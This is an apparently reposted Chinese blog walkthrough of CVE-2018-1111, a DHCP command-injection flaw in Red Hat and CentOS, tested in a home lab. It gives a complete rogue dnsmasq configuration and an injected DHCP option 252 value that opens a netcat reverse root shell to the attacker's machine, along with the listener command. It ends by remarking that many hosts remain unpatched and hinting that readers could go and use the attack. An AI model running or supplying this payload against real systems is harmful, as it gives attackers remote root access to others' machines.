java中的接口是类吗
270
2022-10-10
CVE-2018-1111 劫持dhcp造成Redhat、centos代码执行(CVE-2018-10561)
前言: 看到crazy 老哥说有一个好新的漏洞。可以在redhat 和centos 执行任意代码 、 我说这就很有意思了。晚上来看看
他分享了一下他写的博客。看了下。进入tools 看了下这个文章,仔细的看了下, 很有意思。有意思
漏洞概述通过伪造DHCP服务器发送响应包,***红帽系统,获取root权限并执行任意命令。
影响:
测试了一下 centos6 和centos7 都受到这个影响
利用的整个过程:
宿主机环境:Windows 10 企业版 虚拟机环境:VMware Workstation
***者:Kali linux受害者:centos7
1. 两台虚拟机的网络适配器都需要设置为 仅主机模式2. 停用主机模式的DHCP服务
首先将两个虚拟机设置成仅主机模式,关闭dhcp功能。
kali设置成静态地址,要和下文中的conf中的地址相同,网关也是本机ip。这里我设置成192.168.71.5
root@kali:~# route add default gw 192.168.71.5 kali创建个dnsmasp.conf内容如下: bind-interfaces interface=eth0 except-interface=lo dhcp-range=192.168.75.10,192.168.75.20,12h dhcp-option=3,192.168.71.5 dhcp-option=6,192.168.71.5 log-queries log-facility=/var/log/dnsmasq.log
开启dnsmasp:
dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.71.5 6666 #"
nc侦听6666端口
nc -l -p 6666 -v
kali 这边已经完成了
现在centos重启一下网卡!
已经显示获取到了IP 了 看看kali 这边的情况吧
写了一个文件。在centos 里面查看一下
总结:
漏洞原理应该是使用了单引号导致了参数被执行。
**--dhcp-option="252,malayke'&nc -e /bin/bash 192.168.182.130 6666 #"**
现在应该还有很多主机是没有补丁的。。可以去 …. hhhhhhh
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~